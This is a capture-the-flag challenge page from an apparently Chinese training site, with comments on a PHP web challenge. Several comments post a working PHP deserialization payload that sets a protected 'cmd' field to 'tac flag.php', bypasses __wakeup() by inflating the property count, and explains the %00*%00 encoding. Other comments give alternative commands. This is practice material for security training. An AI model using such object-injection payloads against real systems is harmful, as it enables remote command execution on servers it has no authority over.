安慰奖WEB 未解决

分数: 35 金币: 5
题目作者: harry
一  血: dotast
一血奖励: 2金币
解  决: 2352
提  示:
描  述:
flag{}
评论
harry2025 1月前

http://171.80.2.169:14918?code=O:3:"ctf":3:{s:11:"%00*%00username";s:5:"admin";s:6:"%00*%00cmd";s:12:"tac flag.php";}

回复 0

陈亮 2月前

flag{***}

回复 0

网恋秀牛子被录屏导致自卑 2月前

执行命令时,我用的“cp flag.php flag.txt”绕过,这样的话就复制了文件,然后直接访问flag.txt就行,屏幕输出NULL是因为这个命令没有输出的,但执行了。

回复 0

admit 6月前

/?code=O:3:%22ctf%22:3:{s:11:%22%00*%00username%22;s:5:%22admin%22;s:6:%22%00*%00cmd%22;s:12:%22tac%20flag.php%22;}

回复 1

iNMB 8月前

此外必须用 %00(空字符),不能用 %20(空格)。 protected 声明的字段为保护字段,在所声明的类和该类的子类中可见,但在该类的对象实例中不可见。 因此保护字段的字段名在序列化时,字段名前面会加上 \0*\0 的前缀,注意,这里的 \0 表示 ASCII 码为 0 的字符,也就是我们经过 urlencode 后看到的 %00 。

回复 2

iNMB 8月前

绕过__wakeup()后使用tac等其他输出字符的命令即可

回复 0

llc123 10月前

c\at flag.php也行

回复 0

pezn1and 10月前

code=O:3:"ctf":3:{s:11:"%00*%00username";s:5:"admin";s:6:"%00*%00cmd";s:12:"tac flag.php";}

回复 0

zbss 11月前

备份网站没有文件,环境出问题了吧,退钱,我还试了两次

回复 1

iamblue 1年前

O%3A3%3A%22ctf%22%3A3%3A%7Bs%3A11%3A%22%00%2A%00username%22%3Bs%3A5%3A%22admin%22%3Bs%3A6%3A%22%00%2A%00cmd%22%3Bs%3A12%3A%22tac+flag.php%22%3B%7D

回复 1

WriteUp

image
小赵同学

3 金币

评分(4)

解题动态

Newdap 攻破了该题 6天前
Wu. 攻破了该题 7天前
YYYYY123 攻破了该题 11天前
liqs 攻破了该题 12天前
风起 攻破了该题 13天前
WYYYYTT 攻破了该题 13天前
yyt030 攻破了该题 16天前
Mori. 攻破了该题 23天前
乱来小木 攻破了该题 24天前
hdcc1 攻破了该题 26天前
qq1002517 攻破了该题 27天前
flag大王 攻破了该题 1月前
xiaoxiaojiangshi 攻破了该题 1月前
shuiniu221 攻破了该题 1月前
2838932518 攻破了该题 1月前
scv 攻破了该题 1月前
klfx1913 攻破了该题 1月前
等往事风中吹‘ 攻破了该题 1月前
WindZQ 攻破了该题 1月前
木木夕 攻破了该题 1月前
问题反馈